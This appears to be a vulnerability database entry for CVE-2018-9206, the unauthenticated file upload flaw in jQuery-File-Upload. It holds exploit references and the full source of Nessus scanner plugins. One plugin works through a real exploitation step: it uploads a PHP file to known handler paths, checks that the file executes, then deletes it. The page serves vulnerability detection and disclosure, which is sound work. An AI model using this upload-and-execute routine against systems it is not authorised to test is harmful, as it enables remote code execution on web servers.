Vulnerabilities > CVE-2018-9206 - Unrestricted Upload of File with Dangerous Type vulnerability in Jquery File Upload Project Jquery File Upload
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH network
low complexity
jquery-file-upload-project
CWE-434
critical
nessus
exploit available
metasploit
Summary
Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Accessing Functionality Not Properly Constrained by ACLs In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application or can run queries for data that he is otherwise not supposed to.
- Privilege Abuse An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.
D2sec
| name | jQuery File Upload |
| url | http://www.d2sec.com/exploits/jquery_file_upload.html |
Exploit-Db
file exploits/php/remote/45790.rb id EDB-ID:45790 last seen 2018-11-30 modified 2018-11-06 platform php port published 2018-11-06 reporter Exploit-DB source https://www.exploit-db.com/download/45790 title blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit) type remote file exploits/php/webapps/46182.py id EDB-ID:46182 last seen 2019-01-16 modified 2019-01-16 platform php port 80 published 2019-01-16 reporter Exploit-DB source https://www.exploit-db.com/download/46182 title Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit type webapps
Metasploit
| description | This module exploits an arbitrary file upload in the sample PHP upload handler for blueimp's jQuery File Upload widget in versions <= 9.22.0. Due to a default configuration in Apache 2.3.9+, the widget's .htaccess file may be disabled, enabling exploitation of this vulnerability. This vulnerability has been exploited in the wild since at least 2015 and was publicly disclosed to the vendor in 2018. It has been present since the .htaccess change in Apache 2.3.9. This module provides a generic exploit against the jQuery widget. |
| id | MSF:EXPLOIT/UNIX/WEBAPP/JQUERY_FILE_UPLOAD |
| last seen | 2020-06-14 |
| modified | 2019-06-24 |
| published | 2018-10-23 |
| references |
|
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/jquery_file_upload.rb |
| title | blueimp's jQuery (Arbitrary) File Upload |
Nessus
NASL family CGI abuses NASL id JQUERY_FILEUPLOAD_RCE.NASL description The version of jQuery-File-Upload running on the remote host is affected by an arbitrary file upload vulnerability. An unauthenticated attacker could leverage this vulnerability to gain access to the host in the context of the web application user. last seen 2020-06-01 modified 2020-06-02 plugin id 118310 published 2018-10-22 reporter This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/118310 title jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(118310); script_version("1.14"); script_cvs_date("Date: 2019/11/27"); script_cve_id("CVE-2018-9206"); script_name(english:"jQuery-File-Upload Arbitrary File Upload Vulnerability (Remote Check)"); script_summary(english:"Attempts to upload a file and confirm a remote code execution vulnerability exists."); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP application that is affected by a file upload vulnerability allowing remote code execution."); script_set_attribute(attribute:"description", value: "The version of jQuery-File-Upload running on the remote host is affected by an arbitrary file upload vulnerability. An unauthenticated attacker could leverage this vulnerability to gain access to the host in the context of the web application user."); script_set_attribute(attribute:"see_also", value:"https://github.com/blueimp/jQuery-File-Upload/"); script_set_attribute(attribute:"see_also", value:"http://www.vapidlabs.com/advisory.php?v=204"); script_set_attribute(attribute:"see_also", value:"https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9206"); # https://www.zdnet.com/article/zero-day-in-popular-jquery-plugin-actively-exploited-for-at-least-three-years/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?096ac7c1"); script_set_attribute(attribute:"solution", value: "Upgrade to blueimp/jQuery-File-Upload version 9.22.1 or later. Additionally if using a branch of this project, contact the branch maintainer for a product security update."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9206"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"jQuery File Upload"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'blueimps jQuery (Arbitrary) File Upload'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2018/10/11"); script_set_attribute(attribute:"patch_publication_date", value:"2018/10/11"); script_set_attribute(attribute:"plugin_publication_date", value:"2018/10/22"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"x-cpe:/a:jquery-file-upload:jquery-file-upload"); script_end_attributes(); script_category(ACT_DESTRUCTIVE_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("webmirror3.nbin", "http_version.nasl"); script_require_keys("www/PHP"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("json.inc"); port = get_http_port(default:80, php:TRUE); urls = { "server/php/upload.class.php": "server/php/index.php", "jQuery-File-Upload/server/php/upload.class.php": "/jQuery-File-Upload/server/php/index.php", "example/upload.php": "example/upload.php", "jQuery-File-Upload/example/upload.php": "jQuery-File-Upload/example/upload.php", "server/php/UploadHandler.php": "server/php/index.php", "jQuery-File-Upload/server/php/UploadHandler.php": "jQuery-File-Upload/server/php/index.php", "php/index.php": "php/index.php", "jQuery-File-Upload/php/index.php": "jQuery-File-Upload/php/index.php" }; function http_del(url) { res = http_send_recv3( method : "DELETE", port : port, item : url ); if (res && res[2]) return [http_last_sent_request(), res[2]]; } vuln = FALSE; found = FALSE; filename = "jqueryfileupload-" + rand_str(length:8) + ".php"; bound = rand_str(length:16, charset:"0123456789abcdef"); boundary = "--" + bound; postdata = boundary + '\r\n' + 'content-disposition: form-data; name="files"; filename="' + filename + '"\r\n' + 'content-type: text/plain\r\n' + '\r\n' + '<?php echo "<html>' + substr(SCRIPT_NAME, 0, strlen(SCRIPT_NAME) - 2) + '"; echo "' + substr(SCRIPT_NAME, strlen(SCRIPT_NAME) - 1) + '</html>" ?>\r\n' + boundary + '--\r\n'; if (thorough_tests) { curr_dir = get_kb_item_or_exit("www/" + port + "/content/directory_index"); } else { curr_dir = "/"; } foreach url (keys(urls)) { # Check for the vulnerable script or required library res = http_send_recv3( method : "HEAD", port : port, item : build_url(port:port, qs:curr_dir + url), exit_on_fail : TRUE ); if ("200 OK" >< res[0]) { # upload the php file res = http_send_recv3( method : "POST", port : port, item : build_url(port:port, qs:curr_dir + urls[url]), add_headers : {"Content-Type": "multipart/form-data; boundary=" + bound}, data : postdata, exit_on_fail : TRUE ); if (res && res[2]) { post_req = http_last_sent_request(); post_res = res[2]; json = json_read(res[2]); } else { audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url])); } if (typeof(json) == "array" && json[0]['files'][0]['name'] && json[0]['files'][0]['url'] && json[0]['files'][0]['deleteUrl']) { filename2 = json[0]['files'][0]['name']; shellurl = json[0]['files'][0]['url']; delurl = json[0]['files'][0]['deleteUrl']; } else if (typeof(json) == "array" && json[0]['0']['name'] && json[0]['0']['url'] && json[0]['0']['delete_url']) { filename2 = json[0]['0']['name']; shellurl = json[0]['0']['url']; delurl = json[0]['0']['delete_url']; } else if (typeof(json) == "array" && json[0]['name'] && json[0]['url'] && json[0]['delete_url']) { filename2 = json[0]['name']; shellurl = json[0]['url']; delurl = json[0]['delete_url']; } else if (typeof(json) == "array" && (json[0]['error'] || json[0]['0']['error'] || json[0]['files'][0]['error'])) # correctly working script audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url])); else { # Not sure what came back. try to do a delete if we got a 200 in case it worked anyway if ("200 OK" >< res[0]) http_del(url:build_url(port:port, qs:curr_dir + urls[url]) + '?file=' + filename); audit(AUDIT_RESP_BAD, port, "POST " + curr_dir +urls[url]); } if (filename2 && shellurl && delurl) { # Did htaccess rewrite it? if (filename != filename2 && !pregmatch(pattern:".php$", string:filename2)) { http_del(url:delurl); audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url])); } vuln = TRUE; } found = TRUE; break; } } if (found && !vuln) audit(AUDIT_WEB_APP_NOT_AFFECTED, "jQuery-File-Upload", build_url(port:port, qs:curr_dir + urls[url])); if (!found) audit(AUDIT_WEB_APP_NOT_INST, "jQuery-File-Upload", port); # test the file res = http_send_recv3( method : "GET", port : port, item : shellurl ); # this is a test to see if PHP is executing our upload if (res && res[2] && SCRIPT_NAME >< res[2]) { shell_req = http_last_sent_request(); shell_res = res[2]; } # delete the file out = http_del(url:delurl); if (out) { del_res = out[1]; del_req = out[0]; } if (vuln) { # build request and output: request = []; output = []; if (post_req) { request = make_list(request, '>>>>>\n' + post_req + '<<<<<\n' + post_res); } if (shell_req) { request = make_list(request, '>>>>>\n' + shell_req + '<<<<<\n' + shell_res); } if (del_req) { request = make_list(request, '>>>>>\n' + del_req + '<<<<<\n' + del_res); } security_report_v4( port : port, severity : SECURITY_HOLE, line_limit : 20, request : request, generic : TRUE ); } exit(0);NASL family CGI abuses NASL id ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2019.NASL description According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.x prior to 16.2.15.6 or 17.x prior to 17.12.9.2 or 18.x prior to 18.8.4.1. It is, therefore, affected by multiple vulnerabilities: - An arbitrary file upload vulnerability exists in Blueimp jQuery-File-Upload. An unauthenticated, remote attacker can exploit this to upload arbitrary files on the remote host subject to the privileges of the user. - A remote command execution vulnerability exists in jackson-databind due to a failure to block various classes from polymorphic deserialization. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2018-14718, CVE-2018-14719 CVE-2018-14720, CVE-2018-14721) Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 121251 published 2019-01-18 reporter This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/121251 title Oracle Primavera Unifier Multiple Vulnerabilities (Jan 2019 CPU) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(121251); script_version("1.7"); script_cvs_date("Date: 2019/11/27"); script_cve_id( "CVE-2018-9206", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721" ); script_name(english:"Oracle Primavera Unifier Multiple Vulnerabilities (Jan 2019 CPU)"); script_summary(english:"Checks the version of Oracle Primavera Unifier."); script_set_attribute(attribute:"synopsis", value: "An application running on the remote web server is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.x prior to 16.2.15.6 or 17.x prior to 17.12.9.2 or 18.x prior to 18.8.4.1. It is, therefore, affected by multiple vulnerabilities: - An arbitrary file upload vulnerability exists in Blueimp jQuery-File-Upload. An unauthenticated, remote attacker can exploit this to upload arbitrary files on the remote host subject to the privileges of the user. - A remote command execution vulnerability exists in jackson-databind due to a failure to block various classes from polymorphic deserialization. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2018-14718, CVE-2018-14719 CVE-2018-14720, CVE-2018-14721) Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); # https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?799b2d05"); script_set_attribute(attribute:"solution", value: "Upgrade to Oracle Primavera Unifier version 16.2.15.6 / 17.12.9.2 / 18.8.4.1 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9206"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"jQuery File Upload"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'blueimps jQuery (Arbitrary) File Upload'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2019/01/11"); script_set_attribute(attribute:"patch_publication_date", value:"2019/01/11"); script_set_attribute(attribute:"plugin_publication_date", value:"2019/01/18"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"x-cpe:/a:oracle:primavera_unifier"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_primavera_unifier.nbin"); script_require_keys("installed_sw/Oracle Primavera Unifier", "www/weblogic"); script_require_ports("Services/www", 8002); exit(0); } include("http.inc"); include("vcf.inc"); get_install_count(app_name:"Oracle Primavera Unifier", exit_if_zero:TRUE); port = get_http_port(default:8002); get_kb_item_or_exit("www/weblogic/" + port + "/installed"); app_info = vcf::get_app_info(app:"Oracle Primavera Unifier", port:port); vcf::check_granularity(app_info:app_info, sig_segments:3); constraints = [ { "min_version" : "16.1.0.0", "fixed_version" : "16.2.15.6" }, { "min_version" : "17.1.0.0", "fixed_version" : "17.12.9.2" }, { "min_version" : "18.8.0.0", "fixed_version" : "18.8.4.1" } ]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
Packetstorm
data source https://packetstormsecurity.com/files/download/151206/blueimpjqueryfu9220-upload.txt id PACKETSTORM:151206 last seen 2019-01-17 published 2019-01-17 reporter Larry W. Cashdollar source https://packetstormsecurity.com/files/151206/Blueimp-jQuery-File-Upload-9.22.0-Arbitrary-File-Upload.html title Blueimp jQuery File Upload 9.22.0 Arbitrary File Upload data source https://packetstormsecurity.com/files/download/150180/jquery_file_upload.rb.txt id PACKETSTORM:150180 last seen 2018-11-06 published 2018-11-05 reporter Larry W. Cashdollar source https://packetstormsecurity.com/files/150180/blueimp-jQuery-Arbitrary-File-Upload.html title blueimp jQuery Arbitrary File Upload
References
- http://www.vapidlabs.com/advisory.php?v=204
- https://wpvulndb.com/vulnerabilities/9136
- https://www.exploit-db.com/exploits/45790/
- http://www.securityfocus.com/bid/106629
- https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
- https://www.exploit-db.com/exploits/46182/
- http://www.securityfocus.com/bid/105679